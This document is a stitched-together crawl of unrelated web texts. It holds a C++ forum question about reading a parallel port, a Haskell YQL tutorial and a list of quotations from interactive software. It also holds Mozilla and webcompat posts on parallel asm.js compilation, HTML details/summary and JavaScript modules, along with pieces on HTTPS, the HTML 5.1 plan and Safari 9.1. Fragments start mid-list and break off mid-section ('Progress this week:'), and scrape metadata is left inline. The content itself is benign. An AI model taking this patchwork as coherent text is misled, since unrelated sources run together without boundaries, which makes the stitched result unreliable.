Today: 2016-03-25T10:41:48.606549 418 open issues ---------------------- needsinfo 2 needsdiagnosis 131 needscontact 96 contactready 84 sitewait 105 ----------------------
You are welcome to participate
When working on an invalid webcompat issue, I noticed something in the Opera Blink developer tools console which made me happy.
Noticed the message? "jquery-1.6.2.min.js:18 'webkitRequestAnimationFrame' is vendor-specific. Please use the standard 'requestAnimationFrame' instead."
-webkit-border-image
There is progress on the front of
-webkit-border-image and border-style in the WebKit/Blink world. Some Web sites might break, which should help get them fixed.
Mike kicked off the discussion for London Mozilla meeting on the Webcompat side. If you want to participate and provide a topic that you are ready to push, please add to the wiki and/or the mailing list.
(a selection of some of the bugs worked on this week).
width <object> for Firefox only.
Otsukare!
And as usual we have completed our API with some new additions:
Seen.
Progress this week:
Today: 2016-03-18T18:14:59.820644 450 open issues ---------------------- needsinfo 9 needsdiagnosis 130 needscontact 95 contactready 84 sitewait 104 ----------------------
You are welcome to participate
(a selection of some of the bugs worked on this week).
document.write() + user agent sniffing + bad css selectors = image too big. Another one difficult to contact.
form.py, 865 on
database, 969
width <object> for Firefox only.
Otsukare!
Since.
A few minutes ago, Mozilla released a new version of Firefox, and we can already enjoy new and interesting features in our favorite browser. In case you didn't know, releases of the red panda will no longer ship every 6 weeks; from now on they will follow a variable cadence of between 6 and 8 weeks.
If you ever dreamed of speaking to a web page and having it carry out actions, just as you do on iOS or Android, you can now do so from Firefox. Web Speech makes it possible to incorporate voice data into our pages and web applications, allowing certain features, such as authentication, to be controlled by voice.
Web Speech comprises two fundamental components: recognition (as its name indicates, it is in charge of recognizing speech from an input device) and synthesis (text to speech). For more details on how to use this API you can read the article published on MDN. On GitHub you will also find some examples illustrating speech recognition and synthesis.
Since the inclusion of Sync in the browser, you can share your information and preferences (such as bookmarks, passwords, open tabs, reading list, and installed add-ons) across all your devices to stay up to date and not miss a thing.
With this release, seeing the tabs open on your other devices becomes much easier and more intuitive: as soon as you sync, a button
appears in the toolbar, which lets you access those pages on your computer, via a panel, with a single click. Also, while you type in the address bar, those tabs will be shown in the drop-down list.
Panel showing the tabs open on other devices
If you have never set up Sync and would like to, you can read this article in Mozilla Support. It's quick and easy!
Thanks to the collaboration of the Mozilla communities of Paraguay and Bolivia, and of the Universidad Nacional de Asunción (UNA), it has been possible to translate Firefox into Guarani, an indigenous language of Latin America widely used in Paraguay alongside Spanish; it is also spoken in some regions of southern Brazil and northern Argentina, as well as in an area of Bolivia.
The project, christened Aguaratata (fire fox), took approximately 2 years, and more than 45,000 words were translated. Guarani thus becomes one of the 91 localizations in which Firefox is available.
Panorama, the feature that let us manage groups and organize our tabs, will finally be removed from Firefox. This news had been circulating for some time, since Panorama was used by less than 1% of users, and on the developers' side its maintenance was complicated given the changes currently happening in the heart of Firefox.
If you are one of those who used this feature, when you update to Firefox 45 a special tab will appear explaining what happened. All your tab groups will automatically be converted into bookmarks and saved in the bookmarks folder. You will be able to access them by clicking the bookmarks button
in the toolbar.
If you want a direct replacement, try the Tab Groups add-on, which was created directly from the Firefox code and works just like the old feature. If you install it before updating to Firefox 45:
Using Tab Groups will feel as if the feature had never disappeared from Firefox, and you won't notice the change when you update.
If you'd rather see the full list of new features, head over to the release notes (in English).
We don't have the mobile versions yet, but we'll let you know when we do.
You can get this version from our Downloads area in Spanish and English for Linux, Mac, and Windows. If you liked it, please share this news with your friends on social networks. Feel free to leave us a comment.
I remember a time, not so very long ago, when Gecko powered 4 or 5 non-Mozilla browsers, some of them on exotic platforms, as well as GPS devices, wysiwyg editors, geographic platforms, email clients, image editors, eBook readers, documentation browsers, the UX of virus scanners, etc, as well as a host of innovative and exotic add-ons. In these days, Gecko was considered, among other things, one of the best cross-platform development toolkits available.
The year is now 2016 and, if you look around, you’ll be hard-pressed to find Gecko used outside of Firefoxen (alright, and Thunderbird and Bluegriffon). Did Google or Apple or Microsoft do that? Not at all. I don’t know how many in the Mozilla community remember this, but this was part of a Mozilla strategy. In this post, I’d like to discuss this strategy, its rationale, and the lessons that we may draw from it.
For the first few years of Firefox, enthusiasm for the technology behind the browser was enormous. After years of implementing Gecko from scratch, Mozilla had a kick-ass cross-platform toolkit that covered almost everything from system interaction to network, cryptography, user interface, internationalization, even an add-on mechanism, a scripting language and a rendering engine. For simplicity, let’s call this toolkit XUL. Certainly, XUL had a number of drawbacks, but in many ways, this toolkit was years ahead of everything that other toolkits had to offer at the time. And many started to use XUL for things that had never been planned. Dozens of public projects and certainly countless more behind corporate doors. Attempts were made to extend XUL towards Python, .Net, Java and possibly more. These were the days of the “XUL Planet”. All of this was great – for one, that is how I joined the Mozilla community, embedding Gecko in exotic places and getting it to work nicely with exotic network protocols.
But this success was also hurting Mozilla’s mission in two ways. The first way was the obvious cost. The XUL platform had a huge API, in JavaScript, in C, in C++, in IDL, in declarative UI (XUL and XBL), not to mention its configuration files and exotic query language (hello, RDF, I admit that I don’t really miss you that much), and I’m certain I miss a few. Oh, that’s not including the already huge web-facing API that can never abandon backwards compatibility with any feature, of course. Since third-party developers could hit any point of this not-really-internal API, any change made to the code of Gecko had the potential of breaking applications in subtle and unexpected ways – applications that we often couldn’t test ourselves. This meant that any change needed to be weighed carefully as it could put third-party developers out of business. That’s hardly ideal when you attempt to move quickly. To make things worse, this API was never designed for such a scenario, many bits were extremely fragile and often put together in haste with the idea of taking them down once a better API was available. Unfortunately, in many cases, fixing or replacing components often proved impossible, for the sake of compatibility. And to make things even worse, the XUL platform was targeting an insane number of Operating Systems, including Solaris, RiscOS, OS/2, even the Amiga Workbench if I recall correctly. Any change had to be kept synchronized between all these platforms, or, once again, we could end up putting third-party developers out of business by accident.
So this couldn’t last forever.
Another way this success was hurting Mozilla is that XUL was not the web. Recall that Mozilla’s objectives were not to create yet another cross-platform toolkit, no matter how good, but to Take Back the Web from proprietary and secret protocols. When the WhatWG and HTML5 started rising, it became clear that the web was not only taken back, but that we were witnessing the dawn of a new era of applications, which could run on all operating systems, which were based on open protocols and at least at some level on open-source. The Web Applications were the future – an ideal future, by some criteria – and the future was there. In this context, non-standard, native cross-platform toolkits were a thing of the past, something that Mozilla was fighting, not something that Mozilla should be promoting. It made entire sense to stop putting resources in XUL and concentrate more tightly on the web.
So XUL as a cross-platform toolkit couldn’t last forever.
I’m not sure exactly who took the decision but at some point around 2009, Mozilla’s strategy changed. We started deprecating the use cases of Gecko that were not the Web Platform. This wasn’t a single decision or a single fell swoop, and this didn’t go in one single unambiguous direction, but this happened. We got rid of the impedimenta.
We reinvented Gecko as a Firefox monoculture.
We have now been living in a Gecko monoculture long enough to be able to draw lessons from our choices. So let’s look at the costs and benefits.
Now that third-party developers using Gecko and hitting every single internal API are gone, it is much easier to refactor. Some APIs are clearly internal and I can change them without referring to anyone. Some are still accessible by add-ons, and I need to look for add-ons that use them and get in touch with their developers, but this is still infinitely simpler than it used to be. Already, dozens of refactorings that were critically needed but that had been blocked at some point in the past by backwards internal compatibility have been made possible. Soon,
Jetpack WebExtensions will become the sole entry point for writing most add-ons, and Gecko developers will finally be free to refactor their code at will as long as it doesn’t break public APIs, much like developers of every single other platform on the planet.
Similarly, dropping support for exotic platforms made it possible to drop plenty of legacy code that was hurting refactoring, and in many cases, made it possible to write richer APIs without being bound by the absolute need to implement everything on every single platform.
In other words, by the criteria of reducing costs and increasing agility, yes, the Gecko monoculture has been a clear success.
Our second objective was to promote web applications. And if we look around, these days, web applications are everywhere – except on mobile. Actually, that’s not entirely true. On mobile, a considerable number of applications are built using PhoneGap/Cordova. In other words, these are web applications, wrapped in native applications, with most of the benefits of both worlds. Indeed, one could argue that PhoneGap/Cordova applications are more or less applications which could have been developed with XUL, and are instead developed with a closer-to-standards approach. As a side note, it is a little-known fact that one of the many (discarded) designs of FirefoxOS was as a runtime somewhat comparable to PhoneGap/Cordova, which would have replaced the XUL platform.
Despite the huge success of web applications and even the success of hybrid web/native applications, the brand new world in which everything would be a web application hasn’t arrived yet, and it is not sure that it ever will. The main reason is that mobile has taken over the world. Mobile applications need to integrate with a rather different ecosystem, with push notifications, working disconnected, transactions and microtransactions, etc., not to mention a host of new device-specific features that were not initially web-friendly. Despite the efforts of most browser vendors, browsers still haven’t caught up with this moving target. New mobile devices have gained voice recognition, and in the meantime, the WhatWG is still struggling to design a secure, cross-platform API for accessing local files.
In other words, by the criteria of pushing web applications, I would say that the Gecko monoculture has had a positive influence, but not quite enough to be called a success.
The Hackerbase
Now that we have seen the benefits of this Gecko monoculture, perhaps it is time to look at the costs.
By turning Gecko into a Firefox monoculture, we have lost dozens of products. We have almost entirely lost the innovations that were not on the roadmap of the WhatWG, as well as the innovators themselves. Some of them have turned to web applications, which is what we wanted, or hybrid applications, which is close enough to what we wanted. In the meantime, somewhere else in the world, the ease of embedding first WebKit and now Chromium (including Atom/Electron) have made it much easier to experiment and innovate with these platforms, and to do everything that has ever been possible with XUL, and more. Speaking only for myself, if I were to enter the field today with the same kind of technological needs I had 15 years ago, I would head towards Chromium without a second thought. I find it a bit sad that my present self is somehow working against my past self, while they could be working together.
By turning our back on our Hackerbase, we have lost many things. In the first place, we have lost smart people, who may have contributed ideas or code or just dynamism. In the second place, we have lost plenty of opportunities for our code and our APIs to be tested for safety, security, or just good design. That’s already pretty bad.
Just as importantly, we have lost opportunities to be part of important projects. Chris Lord has more to say on this topic, so I’ll invite you to read his post if you are interested.
Also, somewhere along the way, we have largely lost any good reason to provide clean and robust APIs, to separate concerns between our libraries. I would argue that the effects of this can be witnessed in our current codebase. Perhaps not in the web-facing APIs, that are still challenged by their (mis)usage in terms of convenience, safety and robustness, but in all our internal+addons APIs, many of which are sadly under-documented, under-tested, and designed to break in new and exciting ways whenever they are confronted with unexpected inputs. One could argue that the picture I am painting is too bleak, and that some of our fragile APIs are, in fact, due to backwards compatibility with add-ons or, at some point, third-party applications.
Regardless, by the criteria of our Hackerbase, I would count the Gecko monoculture as a bloody waste.
So the monoculture has succeeded at making us faster, has somewhat helped propagate Web Applications, and has hurt us by severing our hackerbase.
Before starting to write this blogpost, I felt that turning Gecko into a Firefox monoculture was a mistake. Now, I realize that this was probably a necessary phase. The Gecko from 2006 was impossible to fix, impossible to refactor, impossible to improve. The Firefox from 2006 would have needed a nearly-full reimplementation to support e10s or Rust-based code (ok, I’m excluding Rust-over-XPConnect, which would be a complete waste). Today’s Gecko is much fitter to fight against WebKit and Chromium. I believe that tomorrow’s Gecko – not Firefox, just Gecko – with full support for WebExtensions and progressive addition of new, experimental WebExtensions, would be a much better technological base for implementing, say, a cross-platform e-mail client, or an e-Book reader, or even a novel browser.
As all phases, though, this monoculture needs to end sooner or later, and I certainly hope that it ends soon, because we keep paying the cost of this transformation through our community.
It is my belief that we now need to consider an exit strategy from the Gecko monoculture. No matter which strategy is picked, it will have a cost. But I believe that the potential benefits in terms of community and innovation will outweigh these costs.
First, we need to avoid repeating past mistakes. While WebExtensions may not cover all the use cases for which we need an extension API for Gecko, they promise a set of clean and high-level APIs, and this is a good base. We need to make sure that whatever we offer as part of WebExtensions or in addition to them remains a set high-level, well-insulated APIs, rather than the panic-inducing entanglement that is our set of internal APIs.
Second, we need to be able to extend our set of extension APIs in directions we not planned by any single governing body, including Mozilla. When WebExtensions were first announced, the developers in charge of the project introduced a uservoice survey to determine the features that the community expected. This was a good start, but this will not be sufficient in the long run. Around that time, Giorgio Maone drafted an API for developing and testing experimental WebExtensions features. This was also a good start, because experimenting is critical for innovation. Now, we need a bridge to progressively turn experimental extension APIs into core APIs. For this purpose, I believe that the best mechanism is a RFC forum and a RFC process for WebExtensions, inspired from the success of RFCs in the Rust (or Python) community.
Finally, we need a technological brick to get applications other than Firefox to run Gecko. We have experience doing this, from XULRunner to Prism. A few years ago, Mike De Boer introduced “Chromeless 2”, which was roughly in the Gecko world what Electron is nowadays in the Chromium world. Clearly, this project was misunderstood by the Mozilla community – I know that it was misunderstood by me, and that it took Electron to make me realize that Mike was on the right track. This project was stopped, but it could be resumed or rebooted. To make it easier for the community, using the same API as Electron, would be a possibility.
Similarly, I believe that we need to consider strategies that will let us avoid similar monocultures in our other projects. This includes (and is not limited to) B2G OS (formerly known as Firefox OS), Rust, Servo and Connected Devices.
So far, Rust has proved very open to innovation. For one thing, Rust has its RFC process and it works very well. Additionally, while Rust was originally designed for Servo, it has already escaped this orbit and the temptation of a Servo monoculture. Rust is now used for cryptocurrencies, operating systems, web servers, connected devices… So far, so good.
Similarly, Servo has proved quite open, albeit in very different directions. For one thing, Servo is developed separately from any web browser that may embed it, whether Servo Shell or Browser.html. Also, Servo is itself based on dozens of libraries developed, tested and released individually, by community members. Similarly, many of the developments undertaken for Servo are released themselves as independent libraries that can independently be maintained or integrated in yet other projects… I have hopes that Servo, or at least large subsets, will eventually find its way into projects unrelated to Mozilla, possibly unrelated to web browsers. My only reservation is that I have not checked how much effort the Servo team has made into checking that the private APIs of Servo remain private. If this is the case, so far, so good.
The case of Firefox OS/B2G OS is quite different. B2G OS was designed from scratch as a Gecko application and was entirely dependent on Gecko and some non-standard extensions. Since the announcement that Firefox OS would be retired – and hopefully continue to live as B2G OS – it has been clear that B2G-specific Gecko support would be progressively phased out. The B2G OS community is currently actively reworking the OS to make sure that it can live in a much more standard environment. Similarly, the Marketplace, which was introduced largely to appease carriers, will disappear, leaving B2G OS to live as a web OS, as it was initially designed. While the existence of the project is at risk, I believe that these two changes, together, have the potential to also set it free from a Gecko + Marketplace + Telephone monoculture. If B2G is still alive in one or two years, it may have become a cross-platform, cross-rendering engine operating system designed for a set of devices that may be entirely different from the Firefox Phones. So, I’m somewhat optimistic.
As for Connected Devices, well, these projects are too young to be able to judge. It is our responsibility to make sure that we do not paint ourselves into monocultural corners.
edit Added a link to Chris Lord’s post on the topic of missed opportunities.
The ponpare Web site for mobile devices has a good rendering in Blink and WebKit browsers.
But when it comes to Firefox on Android. Ooops!
I'll pass on the white background which is another issue, and will focus exclusively on the double arrow for the button which is very cool when you want to kill two birds at the same time, but less so for users. What is happening?
Exploring with the Firefox Devtools, we can find the piece of CSS in charge of styling the
select element.
#areaNavi select { padding-right: 10px; margin-right: 0; -webkit-appearance: button; -moz-appearance: button; appearance: button; height: 32px; line-height: 32px; text-indent: 0px; border: 0px; background: url("/iphone/img/icon_sort.png") no-repeat scroll 100% 50% transparent !important; background-size: 7px 9px !important; width: 80px !important; color: #FFF; font-weight: bold; font-size: 11px; }
Everything seems fine at first sight. The developers have put two vendor prefixes (
-webkit- and
-moz-… no
-ms- ?) and the "standard" property.
appearance?
OK. Let's see a bit. Let's take this very simple code:
<select> <option value="0">First option</option> </select>
On MacOSX these are the default rendering for the different browsers :
-moz-appearance: menulist;
-webkit-appearance: menulist;
-webkit-appearance: menulist;
Let's add a styling with an
appearance: button and reloads
<style>select {appearance: button;}</style> <select> <option value="0">First option</option> </select>
It doesn't change anything because no browsers have implemented it. Firefox sends in the console a
Unknown property 'appearance'. Declaration dropped. Let's check if there is a specification. The CSS4 draft about appearance defines only two values:
auto and
none. So it's quite normal a standard property doesn't send back anything.
appearance?
We modify our simple piece of HTML code
<style>select { -moz-appearance: button; -webkit-appearance: button; appearance: button; /*as of today non standard*/ }</style> <select> <option value="0">First option</option> </select>
We start to see interesting things happening.
But let's say that the zoom feature is really a detail… of implementations.
The designer made the select list a button… how does the designer now says to the world: "Hey in fact, I know, I know, I made it a button but what I meant was a menu item list".
background-colorfor
selectand its magical effect
Plain buttons are boring. The very logical thing to do is to add a
background-color… We modify again our HTML code.
<style>select { -moz-appearance: button; -webkit-appearance: button; appearance: button; background-color: #e8a907; }</style> <select> <option value="0">First option</option> </select>
And we get… drums!
-moz-appearance: listitem;?
At least Blink and WebKit just take a background-color.
So the usual answer from the Web designer who was not satisfied with the default rendering of
select and made it a button… is to add an image in the background of the button to say: "yeah yeah I know this is in fact a drop-down menu".
<style> select { -moz-appearance: button; -webkit-appearance: button; appearance: button; background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA8AAAATCAYAAABPwleqAAAA+0lEQVQ4jZ3OIUvEcByH8edEg5gEk4fVYD3lwKxvwGZYsNpkzWK17KrJNVnyFRhcHOLKYKBhRWRlIgPHymRfyw7GsZv73wPf9OMDP4ApcGq4KU3jFfDuHK/lef4m814ACMPwegV8AYBt2ztVVf0YwG9Jm/PXSZLkwQDPaOd53rGkegCsJe2z0CjLstcB+GkRAhAEweUAfNaJLcvaKsvyqwd+SlrvxABxHN/14JulEMB13YO6rn87YCVp3IsB0jR97sCP/0IA3/fPO/DJIDyZTDaKovhowXdJo0EYIIqi2xa+GgwBHMfZk1Q22zbCAJLuJbnGsMGHko6W3f8AtvoZYaFYm9gAAAAASUVORK5CYII=) no-repeat scroll 100% 50% #e8a907; background-size: 7px 9px; width: 150px; height: 30px;} </style> <select> <option value="0">First option</option> </select>
We finally get this:
Now, if your goal was to have the white arrow down in Firefox, you would need to do:
-moz-appearance: none;
At the beginning I thought there was something crazy going on with WebKit based browsers, but there might be a gecko bug too. I added comment on a webcompat issue anyway. We need to dig a bit more into this.
Otsukare!
Here's a twist on the classic "browser has bug, developers change to work around it, sites depend on it, browser has to implement weird workaround to fix their bug without breaking those sites, and then other browsers need to match weird workaround bug compatibility" cycle.
In this case, Bug 1236930 reported that zooming in on Strava maps only worked once. Strava (and a ton of other popular sites) uses a slick little mapping libary called Leaflet.js, and if our work to ship WebKit-prefixed CSS and DOM aliases (check out Bug 1170774) is actually going to uh, ship, we obviously can't break it.
You can read the whole bug later; here's the problem distilled to two lines of JS (see if you can find it):
o.DomUtil.TRANSFORM=o.DomUtil.testProp( ["transform","WebkitTransform", "OTransform","MozTransform","msTransform"]), o.DomUtil.TRANSITION=o.DomUtil.testProp( ["webkitTransition","transition", "OTransition","MozTransition","msTransition"])
You see how they're trying to do the nice thing and test for the right transition and transform properties to use?
Once they know that, they construct the
TRANSITION_END string to attach listeners with elsewhere in the code.
o.DomUtil.TRANSITION_END="webkitTransition"===o.DomUtil.TRANSITION||"OTransition"===o.DomUtil.TRANSITION?o.DomUtil.TRANSITION+"End":"transitionend",
Did you notice how
o.DomUtil.TRANSITION is actually testing for
webkitTransition before the prefixless
transition? (I actually missed that my first time staring at this code, classic rookie move).
Once upon a time, Leaflet.js did the logical thing and tested for prefixless
transition first, but in this sweet bugfix commit, that changed.
You can click through to get references to the bug it fixed, but here's a comment in the patch that gives you a gist of why they did this:
// webkitTransition comes first because some browser versions that drop vendor prefix don't do // the same for the transitionend event, in particular the Android 4.1 stock browser
So at some point in time*, some stock Android browser versions supported prefixless CSS transitions, but forgot to unprefix the
transitionend event. And websites broke, and libraries updated to workaround them.
So we added support to sometimes send
webkit prefixed
transitionend events (and
animationend,
animationiteration and
animationstart) to Gecko in bug 1236979, matching WebKit, Blink, and Edge's behavior.
If you want more details on when to send those events, check out the bug. Or for extra credit, read the DOM spec. We updated that too.
(* Wikipedia says Jelly Bean was released in June 2012, which was when Gotye's 'Somebody That I Used to Know' Feat. Kimbra was the #1 song so I guess we all sort of deserve this mess, honestly.) | http://www.w3.org/html/planet/atom.xml | CC-MAIN-2016-18 | refinedweb | 9,564 | 61.26 |
C:\Panda3D-1.0.3\samples\Basic-Tutorials–Lesson-1-Scene-Graph>C:\Python23\LIB\o
s.py:282: Warning: ‘yield’ will become a reserved keyword in the future
‘import site’ failed; use -v for traceback
C:\Python23\LIB\os.py:282: Warning: ‘yield’ will become a reserved keyword in th
e future
Traceback (most recent call last):
File “Tut-Step-5-Complete-Solar-System.py”, line 12, in ?
import direct.directbase.DirectStart
File “C:\Panda3D-1.0.3\direct_init_.py”, line 2, in ?
import os,sys
File “C:\Python23\LIB\os.py”, line 282
yield top, dirs, nondirs
^
SyntaxError: invalid syntax
does not work “out of box”
i’m sure this is just a configuration problem, but i have no experience w/ python. this project has inspired me to learn it… that is… once i get it running. | https://discourse.panda3d.org/t/not-working-out-of-box-syntax-error/324 | CC-MAIN-2022-33 | refinedweb | 139 | 59.19 |
<<
apatriarcaMembers
Content count875
Joined
Last visited
Community Reputation2365 Excellent
About apatriarca
- RankAdvanced Member
Personal Information
- LocationTorino, Italy
apatriarca replied to ICanC's topic in For BeginnersThe easier way to define the type correctly is to first create a typedef for your function type and then define your function returning that type. getfunc can't set his own value in its implementation. And it can't be a function pointer if you are trying to implement it as a function getting a char and returning a function pointer. getfunc would also have a different type than add or sub.. typedef int (*op_func)(int, int); // .. define add and sub op_func getfunc(char op) { switch(op) { case '+': return add; case '-': return sub; } } int main() { fprintf("5 + 7 = %d", getfunc('+')(5, 7)); fprintf("5 - 7 = %d", getfunc('-')(5, 7)); }
apatriarca replied to Alexey Makarov's topic in Math and PhysicsNot really interpolation. That's a simple sum over the non-zero functions.
apatriarca replied to Alexey Makarov's topic in Math and PhysicsI can't open your link but the basic approach is to define your field as a sum of basis functions centered at the maximum and minimum points. Many different functions can be used. Some additional examples include rational functions like 1/(1 + x^2) or piece-wise polynomial or trigonometric functions like F(x) = cos(x) + 1 in [-pi, pi] and zero outside. What other properties do you want from your peaks? A cubic B-spline basis function is a piece-wise polynomial function which is used as the basis for B-spline curve and surfaces. It is defined recursively and they can be defined for any order/degree. The cubic B-spline basis functions are the more common ones. The local support property can be useful in this case since it means the function is zero outside some distance from these points (thus reducing the amount of computation required).
apatriarca replied to Alexey Makarov's topic in Math and PhysicsI am not sure what you mean by the field to be uniform. You can use any function with a peak in the point to create production or consumption. Different functions will obviously look different. A good candidate can probably be cubic B-spline basis functions. They are quite fast to evaluate and they have a local support. Their derivative is also very easy to compute (which makes it easier to compute the flow).
apatriarca commented on galapogos22's blog entry in Journal of GrufflerNothing I have read in this post can actually be considered PBR. You have in fact just took the intuitive meaning of all those concepts and mixed them. A physically based approach should instead start from the ways a particular material interact with light. The formulas and meaning of the various terms are actually completely wrong. The specular light is computed in an incorrect way and it does not behave like specular light at all. The metallic term is not shininess, but a parameter used to interpolate between two very different material responses. A metal is very specular (even at normal incidence), it has a colored specular reflection and there is no diffused light. A dielectric has instead a mostly diffused response at normal incidence (only about 4% is reflected) and the reflection is white. There is no patina (not sure what you mean here). There are probably also other things. While I agree implementing the concepts is the best way to learn, I think you should still try to read good resources on the subject and implement the concepts properly. If you just try to write things before really understanding them you risk to learn them wrong.
- In the shader you can do many different things to improve the details: 1. Increase the tessellation dynamically using the tessellation shader, 2. Use displacement mapping to give the impression of details without actually adding more geometry.
apatriarca commented on y2kiah's article in General and Gameplay ProgrammingThis sort of implementation is actually useful in a more general settings than game development. This is not however a complete alternative to std::unordered_map since the handles are generated by your handle_map and not by the user. Considering the ECS system for example, the handles of the components will be all different. You can't use a single ID to retrieve all the components of an entity from the various systems.
- A few observations: 1. Do you really need to compute the radius each time? Isn't it a known quantity? 2. Why are you converting every angle to degrees? That's useless and you then have to convert them back to radians (or other range) to be able to use them. 3. The normal of each vertex is the vertex itself normalized. You can thus simply multiply the vector by some value to get the displaced one. If the vector has lenght R and you want its height to be H, you simply have to multiply by H/R. 4. This is probably all best done in a shader. The base displacement can be done in a vertex shader and you can probably also use a tessellation shader to increase details when needed. Finally lighting can do a great work in adding details. 5. I still have to check the correctness of your formulas.
apatriarca replied to isbinil's topic in Math and PhysicsMy problem with volatile was its use inside the loop. In this case the compiler can't rely on the fact the variable has not changed between the various iterations and it has to load&store each time the variable is used. An alternative solution, I think, can be to write to a big array.
apatriarca replied to isbinil's topic in Math and PhysicsThe volatile keyword basically prevents any optimization in the loop. Moreover, each loop iteration depends on the previous one which means low pipeline usage in the CPUs and no chance for SIMD auto-vectorization. This isn't a particularly meaningful benchmark and I think it is not representative of the real performances of these functions. I would simply use sin or sinf. In most cases it should use the correct cpu instruction, eventually also using SIMD ones or treating them as constant expressions.
apatriarca replied to Zingam's topic in General and Gameplay ProgrammingWhat video player library you are using on the other platforms?
apatriarca replied to Jaay_'s topic in Hobby Project ClassifiedsWhy an artist should choose you instead of other people? You are mostly listing your skills, but there is no way to actually understand your level in each skill. Moreover, you are not showing any project you have done and you said you have problems completing your projects. If I were someone looking for a patner for making a project that skill would actually be quite important. Even projects you are not particularly proud of can be important to find someone.
apatriarca replied to Chiezy's topic in Math and PhysicsYou can subdivide the regions with axis aligned rectangles (it seems the section of your cuts are either vertical or horizontal) and quite easily compute the area of the regions by summing all the areas of the rectangles.
apatriarca replied to StanLee's topic in Math and PhysicsIf you do not understand the mathematics (and physics?) of indirect illumination, why are you trying to come up with a real-time algorithm for it? The first step to solve any problem (and thus also creating an algorithm for that) is indeed to understand it in depth. You should have at least looked for algorithms doing the same thing! I find your description very confusing. I am not sure I understand what you mean by "photon" in your algorithm. A photon is simply light, there is no direct or indirect contribution. It also look quite expensive since you probably need to render your scene for a lot of photons and (I guess) store these render buffers in several textures. You will then need to retrieve all these information in some way in the final pass.
apatriarca commented on DemonDar's article in General and Gameplay ProgrammingI personally find your two cons to be actually bigger problems than the pros. I never had much problems with public namespace pollution. I had problems with some code not compiling because I changed what was included in an header file, but if some code break because it relied on some implementation details then that code is buggy. I don't think it is a library fault. It is also a very easy problem to solve. Compile time is instead a very big problem in C++ for me. You should really try to reduce it or it will skyrocket when the project grow bigger. You also spend a lot more time maintaining the code than writing it. | https://www.gamedev.net/profile/105019-apatriarca/?tab=reputation&app_tab=forums&type=given&st=15 | CC-MAIN-2017-30 | refinedweb | 1,470 | 54.32 |
Marshal.WriteInt16(logFont, LogFontNameOffset, (short)'@');
In RTM, some of our IO classes had behavior that was simply inappropriate. One such case is DirectoryInfo.Parent. In RTM, if you called this API and passed a path ending in a slash, the path returned was simply the same path without the slash:
DirectoryInfo di = new DirectoryInfo(@"c:\temp\Dir\");
DirectoryInfo di2 = di.Parent;
In v1.0, the call to Parent returned "c:\temp\Dir" for the DirectoryInfo. However, this is not the way users expect this API to behave: the backslash should simply have been ignored. We therefore changed this API to ignore a trailing backslash, so in v1.1 the above call now returns "c:\temp". As part of this change, DirectoryInfo.Name was changed as well. In v1.0, if a path ended in a backslash, we did no interpretation of the path at all and simply returned the full name. In v1.1, if you specify 'c:\foo\bar\', the name now refers simply to 'bar'. This change in behavior is consistent with the change to Parent.
In the CLR model, we assert that arguments, locals, and return values (things whose size you cannot directly observe) can be expanded at will. When you say float, it means anything greater than or equal to a float. So we can sometimes give you what you asked for 'or better'. When we do this, we can spill 'extra' data, almost like a 'you only asked for 15 precision points, but congratulations! We gave you 18!'. If someone expected the floating point precision to always remain exactly the same, they could be affected. In order to facilitate performance improvements and better scenarios, the CLR may rewrite (as in this case) parts of the register. For example, things that used to truncate because of spilling no longer do. We make these kinds of changes all the time. We believe this is an appropriate change, and it is even called out specifically in the CLI specification as something which can, and will, occur with different iterations:
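A sketch of how the widened precision can surface in practice. The comparison result is intentionally unspecified: whether the intermediate is held at extra precision depends on the JIT and the hardware, which is exactly the point.

```csharp
using System;

class PrecisionSketch
{
    static void Main()
    {
        float a = 0.1f, b = 0.2f;

        // The sum below may be held in a register wider than 32 bits.
        // Casting to float forces truncation to 32-bit precision, so
        // comparing a "live" intermediate against its truncated value
        // is not guaranteed to be true on every runtime/CPU combination.
        bool stable = (a + b) == (float)(a + b);
        Console.WriteLine(stable);
    }
}
```

The practical rule: never depend on the exact precision of an unstored intermediate; store it to a variable or cast it when exact 32-bit rounding is required.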
Affected code will look something like the following:

TypeSpec #4 (1b000004)
-------------------------------------------------------
	TypeSpec : Class System.Byte
It should, however, look like:
TypeSpec #4 (1b000004)
-------------------------------------------------------
	TypeSpec : ValueClass System.Byte
The CLR accepted this incorrect metadata in v1.1. We have tightened down and do not accept it in v2.0.
GetTypeFromCLSID() used to return a type object from a tlbimp'ed assembly if a type with the same GUID had already been loaded. Such a type used to yield 'false' when Type.IsCOMObject was checked, and Type.GetMethodInfo() used to return whatever we could see in the assembly's IL metadata.
Now:
The reason we need to do this is to make things deterministic. In the v1 and v1.1 CLR, if the type had been loaded, we would wrap the created instance with the actual type, even if the Interop assembly for that type hadn't been registered. This could lead to unfortunate race conditions where, depending on what had already run in the AppDomain, the type would be wrapped either with __ComObject or with the actual type. To remove these race conditions, we changed the behavior to wrap the created COM object with the actual type only if the Interop assembly is registered.
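A Windows-only sketch of the lookup described above. The GUID here is a placeholder, not a real coclass; substitute the CLSID of a registered component to experiment.

```csharp
using System;

class ClsidSketch
{
    static void Main()
    {
        // Placeholder CLSID -- substitute a real registered coclass.
        Guid clsid = new Guid("00000000-0000-0000-0000-000000000001");
        Type t = Type.GetTypeFromCLSID(clsid);

        // v2.0: unless the Interop (tlbimp'ed) assembly is registered,
        // t is the generic System.__ComObject wrapper and t.IsCOMObject
        // is true; the runtime no longer swaps in a managed type that
        // merely happens to be loaded with the same GUID.
        Console.WriteLine(t.FullName);
        Console.WriteLine(t.IsCOMObject);
    }
}
```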
The problem with the V1 and V1.1 behavior is that depending on the app and the environment in which it is run (is it ngen'd, is it run off a network share, what are the security settings of the machine, etc.), the CLR might need to start up COM to perform some of the startup code. When this happens, the CLR needs to start up COM before control enters the user's main, and because we need to pick a default, we would CoInitialize it to MTA. As a result, in some situations code that called CoInitialize in your Main method would fail, while under other circumstances it would pass. Changing the CLR never to use COM before the user's code is executed wasn't possible (it's not impossible, it is just way too much work and puts too many restrictions on the CLR to be viable), so we decided to make the behavior deterministic by always CoInitializing to MTA unless the [STAThreadAttribute] was specified on the main method.
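The opt-out is the attribute itself. A minimal sketch: marking the entry point forces the main thread to STA; without the attribute, the CLR now deterministically initializes it to MTA. (Apartment states only have meaning where COM exists, i.e. on Windows.)

```csharp
using System;
using System.Threading;

class Program
{
    [STAThread] // without this, the main thread is CoInitialized to MTA
    static void Main()
    {
        // Reports the apartment the CLR chose for the main thread.
        Console.WriteLine(Thread.CurrentThread.GetApartmentState());
    }
}
```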
Input from Christopher Brumme on this change:
